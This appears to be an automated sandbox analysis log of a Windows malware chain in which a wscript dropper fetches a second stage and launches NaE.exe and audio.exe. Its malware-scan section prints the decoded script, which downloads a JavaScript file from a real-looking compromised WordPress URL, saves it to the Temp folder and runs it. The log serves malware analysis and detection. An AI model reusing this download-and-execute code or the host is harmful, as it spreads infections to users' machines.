Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Binary string: _.pdb source: NaE.exe, 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, NaE.exe, 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, NaE.exe, 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, NaE.exe, 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell");var oRUN = WshShell.Run(filepath);}}catch(e){}IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\824.js.csv");ITextStream.WriteLine(" entry:1762 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22https%3A%2F%2Fpostutopia.net%2Fwp-includes%2Fimages%2Fsmilies%2Fwp.js%22%2C%20false)%3B%0AObj");IServerXMLHTTPRequest2.open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", "false");IServerXMLHTTPRequest2.send();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\824.js.csv");ITextStream.WriteLine(" entry:1762 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22https%3A%2F%2Fpostutopia.net%2Fwp-includes%2Fimages%2Fsmilies%2Fwp.js%22%2C%20false)%3B%0AObj");IServerXMLHTTPRequest2.open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/IDWYPJ.js", "2");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\824.js.csv");ITextStream.WriteLine(" entry:1762 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22https%3A%2F%2Fpostutopia.net%2Fwp-includes%2Fimages%2Fsmilies%2Fwp.js%22%2C%20false)%3B%0AObj");IServerXMLHTTPRequest2.open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/IDWYPJ.js", "2");_Stream.Close();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\824.js.csv");ITextStream.WriteLine(" entry:1762 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22https%3A%2F%2Fpostutopia.net%2Fwp-includes%2Fimages%2Fsmilies%2Fwp.js%22%2C%20false)%3B%0AObj");IServerXMLHTTPRequest2.open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/IDWYPJ.js", "2");_Stream.Close();IWshShell3.Run("C:\Users\user\AppData\Local\Temp/IDWYPJ.
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\NaE.exe");
Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | .Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | .Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | .Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
Source: 4.3.NaE.exe.782700.0.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | .Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
Source: 4.2.NaE.exe.21223f6.2.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | .Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
Source: 4.2.NaE.exe.22d0f08.3.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | .Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
Source: 4.2.NaE.exe.50c0000.9.raw.unpack, Packet.cs | .Net Code: Qqqx1vUcI
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear | 4_2_004019F0
Source: audio.exe.4.dr | Static PE information: real checksum: 0x23bfb should be: 0x3b09a
Source: NaE.exe.3.dr | Static PE information: real checksum: 0x23bfb should be: 0x3b09a
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_0040E21D push ecx; ret | 4_2_0040E230
Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | High entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | High entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | High entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
Source: 4.3.NaE.exe.782700.0.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | High entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
Source: 4.2.NaE.exe.21223f6.2.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | High entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
Source: 4.2.NaE.exe.22d0f08.3.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | High entropy of concatenated method names: 'CrKAxavtX7', 'KDikMXewCI', 'mQ0AlQSH7I', 'xT3AJMfbXn', 'rKmAFR5nZ8', 'HM5AuOr75n', 'N12aeC6ogIAB9', 'upHUPchFbx', 'r4NUChG9eP', 'biIUjdWt0L'
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\NaE.exe
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | File created: C:\Users\user\AppData\Local\Temp\audio.exe

                        Boot Survival

                        Source: Yara match File source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
